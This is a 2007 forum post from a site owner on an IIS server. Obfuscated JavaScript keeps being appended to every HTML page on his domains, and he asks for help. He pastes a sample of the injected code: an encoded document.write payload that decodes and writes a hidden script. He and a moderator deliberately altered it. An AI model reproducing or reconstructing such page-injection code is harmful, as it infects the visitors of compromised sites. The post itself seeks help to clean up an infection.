Msg#: 3477313 posted 7:47 pm on Oct 14, 2007 (gmt 0)
Am new here. I am running a Windows IIs server and i have been getting some script code added to the end of each html page on all domains i am running. Most of the time the code is the same. I was running phpbb forums and suspect the virus came from there but not sure. I contacted the support forum for phpbb community and they said they would look into the security part of the code but never a response from them. So i deleted the databases for those forums and ftp'd the pages on all sites again only to find after a week all domains and pages are infected again. Below is the script code i am finding. I changed the script tag just in case <>
Any help would be appreciated.
<!--[Q]--><*iadded this so it will not function>document.write(unescape("%3Cscript%3Eif%28rqX%21 %3D1%29%7Bfunction%20Cv%28oh%29%7Breturn%20oh%7Dtry %7Dvar%20unW%3D%27ddvdrvd5vdUvdxvdsvdmvdfvd9vdFvdZvdzvd pvdLvdkvdMvdyvdjvdDvd7vd6vdXvdevdAvdlvdWvdOvdYvdqvd8vdo vdCvdbvdVvdKvdJvdHvdNvdnvdIvdavdTvd4vdPvd3vdwvdSvdcvdBv dhvdGvdRvdivdgvrdvrrvr5vrUvrxvrsvrmvrfvr9vrFvrZvrzvrpvr LvrkvrMvryvrjvrDvr7vr6vrXvrevrAvrlvrWvrOvrY%27%3Bvar %20LWg%3DCv%28%27v%27%29%2CHGC%3DArray%28AGr%28%27166 %27%29%2C24816%5E24601%2CAGr%28%27249%27%29%2CAGr%28 %5E11335%2CAGr%28%27186%27%29%2C3434%5E3457%2CAGr dRdpdndpdzrrdjdndxdSrUdVdydWdUdpdbdorjdqdPdzd5dFdHd8dZ dmdKd5dUd8dWdmd8rjr5d8dHd8dZdmdMdRdxd9dUdWdHd8dRdAdVdb dorjdKdrd8dmd6dmdmdUdxrDdFdmd8dpdMdRdrdUd5dRd7dpdsdzd6 dAdVdbdorjdKrdd8dxdNrddmdqr7dVdbdorjdKdDdxdPdmrddqdTdV dKr5d8dZdNdmrddAd7did7didAdVdpdUd8dmdFdUdZdpdodYdzdVdp dBddrxdrd5dUdxdsdmdf%27%3Bvar%20tOA%3DString%28%29%3Bu nW%3DunW.split%28LWg%29%3Bfor%20%28Zhz%3D0%3BZhz%3CQXg .length%3BZhz+%3D2%29%7BYuA%3DQXg.substr%28Zhz%2C2%29% %3DString.fromCharCode%28HGC%5BbJt%5D%5E154%29%3B %7Ddocument.write%28tOA%29%3B%7Dcatch%28nPX%29%7B%7D %7Dvar%20rqX%3D1%3C/script%3E"))</i added this so it will not function><!--[/Q]-->
[edited by: encyclo at 8:23 pm (utc) on Oct. 14, 2007] [edit reason] fixed side-scroll and obfuscated exploit code [/edit]